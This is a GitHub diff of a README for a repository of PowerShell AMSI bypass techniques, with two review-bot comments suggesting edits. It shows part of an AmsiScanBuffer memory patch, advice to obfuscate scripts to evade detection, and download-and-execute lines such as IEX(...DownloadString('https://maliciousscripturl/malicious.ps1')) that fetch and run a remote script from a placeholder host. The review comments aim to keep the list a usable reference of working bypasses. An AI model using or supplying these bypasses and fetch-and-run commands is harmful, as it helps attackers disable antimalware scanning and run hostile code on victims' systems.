Merge pull request #1 from S3cur3Th1sSh1t/master
Updated by Library Project Script. 20200715
wisdark authored Jul 15, 2020
2 parents 2528781 + fd448d5 commit c07adb4
8 changes: 4 additions & 4 deletions README.md
@@ -1,10 +1,10 @@
# Amsi-Bypass-Powershell #
This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts.

Some of the more well known Bypasses are detected by AMSI itself. So you have to obfuscate them via ISESteroids and or Invoke-Obfuscation to get them working. Generally obfuscation can be used as bypass for AMSI.
Most of the scripts are detected by AMSI itself. So you have to find the [trigger](https://github.com/RythmStick/AMSITrigger) and change the signature at the part via variable/function renaming, string replacement or encoding and decoding at runtime. Alternatively obfuscate them via ISESteroids and or Invoke-Obfuscation to get them working.

1. [Patching amsi.dll AmsiScanBuffer by rasta-mouse](#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse "Goto Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse")
2. [Dont use net webclient](#Dont-use-net-webclient "Goto Dont-use-net-webclient")
2. [Dont use net webclient](#Dont-use-net-webclient "Goto Dont-use-net-webclient") - this one is not working anymore
3. [Amsi ScanBuffer Patch from -> https://www.contextis.com/de/blog/amsi-bypass](#Amsi-ScanBuffer-Patch "Goto Amsi-ScanBuffer-Patch")
4. [Forcing an error](#Forcing-an-error "Goto Forcing-an-error")
5. [Disable Script Logging](#Disable-Script-Logging "Goto Disable-Script-Logging")
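Review bot: the status appended to list item 2 (`- this one is not working anymore`) does not say what broke it; since the section heading further down attributes it to a patch, name the Defender/AMSI update (or at least the date and build on which it was observed failing) so readers can judge whether it applies to their target. Minor wording in the replacement sentence: "ISESteroids and or Invoke-Obfuscation" reads as a typo for "and/or", and "change the signature at the part" would be clearer as "change the signature at that point". Suggested line: `2. [Dont use net webclient](#Dont-use-net-webclient "Goto Dont-use-net-webclient") - no longer working since <update/date>`.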
@@ -49,7 +49,7 @@ $Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
```

# Dont use net webclient #
# Dont use net webclient # - Not Working anymore, there was a patch for it

$webreq = [System.Net.WebRequest]::Create(‘https://maliciousscripturl/malicious.ps1’)

@@ -63,7 +63,7 @@ $Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)

IEX($content)

# The Short version of dont use powershell net webclient
# The Short version of dont use powershell net webclient - Not Working anymore, there was a patch for it
```
IEX([Net.Webclient]::new().DownloadString("https://maliciousscripturl/malicious.ps1"))
```
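Review bot: the status text is again written into the heading itself, which changes the heading's generated anchor for anyone linking to `The Short version of dont use powershell net webclient`; put `Not Working anymore` on its own line under the unchanged heading. The snippet `IEX([Net.Webclient]::new().DownloadString("https://maliciousscripturl/malicious.ps1"))` is retained with no working alternative, so either state which AMSI update started flagging it or move patched techniques into a separate section, so the numbered list remains a reference of what currently works.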